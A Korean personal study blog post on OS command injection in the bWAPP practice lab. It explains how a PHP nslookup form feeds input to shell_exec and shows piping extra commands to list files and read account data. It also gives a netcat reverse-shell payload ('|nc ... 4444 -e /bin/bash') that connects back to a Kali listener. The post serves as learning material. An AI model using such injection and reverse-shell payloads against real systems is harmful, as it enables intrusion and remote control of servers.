모의해킹

OS Command Injection

editor9386 2025. 1. 21. 17:29

글쓰기에 앞서 이 블로그는 개인이 공부한 것을 기록해 놓는 용으로 틀린부분이나 잘못된 표현이 있을 수 있습니다.

문제가 틀린 부분을 발견 하면 댓글 부탁드립니다.

OS Command Injection

Lookup을 클릭하면 입력 창에 적힌 주소의 ip정보가 출력되는것 같다. 

 

 

서버에 들어가서 내용을 확인해 보면

위와같은 형식으로 작동한다 

 

$_POST["target"] target 이라는 변수를 POST 메소드로 받고

isset(???) = 안에 들어가는 파라미터(변수)의 값이 null 값이면 false 값이 있으면 true로 반환한다

shell_exec(" ???") php 파일에서 터미널 명령어를 실행하는 명령어

ex) shell_exec(" nslookup") == nslookup 명령어 실행 

 

 

 

nslookup (ip) 

여기서 | (파이프) 를 사용해서 두 가지를 한번에 실행 시키면 어떻게 될까?

 

 shell_exec(" nslookup | ls -al") 을 실행하는 것과 같이 될 것이다 

 

 

 

ls -al이 출력되는 것을 볼 수 있다. 

 

다른 명령어도 사용해보자.

 

계정 정보를 열어볼 수 있다. 

 

 

추가 ++  리버스 커넥션@

 

우선 칼리에서 포트를 nc 명령어로 열어주자

 

nc(netcat) 네트워크 도구로, TCP 또는 UDP 연결을 생성하고 관리할 수 있고 주로 네트워크 진단, 원격 시스템에 명령어 전송, 포트 스캐닝, 채팅 등 다양한 용도로 사용되는 명령어라고 한다. 

 

여기서 -l 은 listen 상태로 변환하는 명령어로 서버가 클라이언트의 요청(접속/접근)을 받을 준비가 완료되었다는 뜻이다.

 

-p는 포트고 임의의 4444포트를 연다는 뜻이다.

 

 

그후 

http://www.nsa.gov|nc 192.168.111.128 4444 -e /bin/bash 을 입력해서 

(-e /bin/bash  (exec)원격 연결이 성공하면 /bin/bash 셸을 실행)

shell_exec("???")는 PHP 파일에서 터미널 명령어를 실행하는 함수이다.

 

칼리에서 열어둔 4444포트로 접속을 하면 칼리에서 bWAPP에 원격 접속을 한것 처럼 된다.

 

 

 

'모의해킹' 카테고리의 다른 글

SQL Injection  (0) 2025.01.24
PHP Code Injection  (0) 2025.01.23
Server-Side Includes (SSI) Injection  (0) 2025.01.21
iFrame injection  (0) 2025.01.20
HTML Injection  (1) 2025.01.19